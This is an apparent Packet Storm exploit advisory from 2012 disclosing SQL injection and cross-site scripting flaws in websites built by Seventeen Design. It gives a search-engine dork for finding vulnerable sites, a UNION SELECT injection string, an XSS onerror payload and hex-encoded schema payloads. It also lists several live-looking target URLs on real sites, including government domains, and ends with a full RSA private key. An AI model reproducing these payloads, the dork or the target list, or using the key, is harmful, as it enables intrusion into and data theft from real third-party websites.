Seventeen Design Cross Site Scripting / SQL Injection

2012-11-29T00:00:00
ID PACKETSTORM:118471
Type packetstorm
Reporter Ur0b0r0x
Modified 2012-11-29T00:00:00

Description

                                        
                                            `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
INDEPENDENT SECURITY RESEARCHER   
PENETRATION TESTING SECURITY  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
# Author: Ur0b0r0x  
# Tiwtte: @Ur0b0r0x  
# Email: ur0b0r0x_@live.com  
# Line: GreyHat  
# Home: http://cyberpunk-ur0x.blogspot.com/  
  
# Exploit Title: Seventeen Design - SQL Injection / Cross-Site Scripting Vulnerabilities   
# Dork: intext:"Producido por: Seventeen Design."  
# Date: 28/11/2012  
# Author: Ur0b0r0x  
# Url Vendor: http://www.seventeendesign.com/  
# Vendor Name: Seventeen Design   
# Tested On: Backtrack R3 / Linux Mint  
# Type: php  
  
------------------- Agreement --------------------  
[24/11/2012] - Vulnerability discovered  
[27/11/2012] - Vendor notified Dont responsed  
[28/11/2012] - Public disclosure   
--------------------------------------------------  
  
# Expl0it/P0c ###################  
http://site.com/*.*id= < Sql Vulnerability Path >  
http://site.com/*.*id= < Xss Vulnerability Path >  
  
# Exploit/Comand/Sql=> +union+select+1,2,3,4--  
# Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");>   
# Payload/Comand/Sql=> table_schema=0x6D6F6E7465676F625F6D6F6E74656176696C61 / table_name=0x6175746F726573   
  
# Demo_Xss_Sql_Vulnerabilities  
http://www.distribuidoradellibro.gob.ve/detalle.php?id=447  
http://www.monteavila.gob.ve/mae/detail_new.php?id=147'  
http://www.murcian.com/aig/nota.php?id=9'  
http://www.asuntopublico.com/noticia.php?id=45'  
  
-----BEGIN RSA PRIVATE KEY-----  
MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl  
Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi  
2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB  
AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8  
GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX  
X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/  
WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R  
8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL  
Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM  
8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM  
BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY  
ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J  
X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/  
-----END RSA PRIVATE KEY-----  
`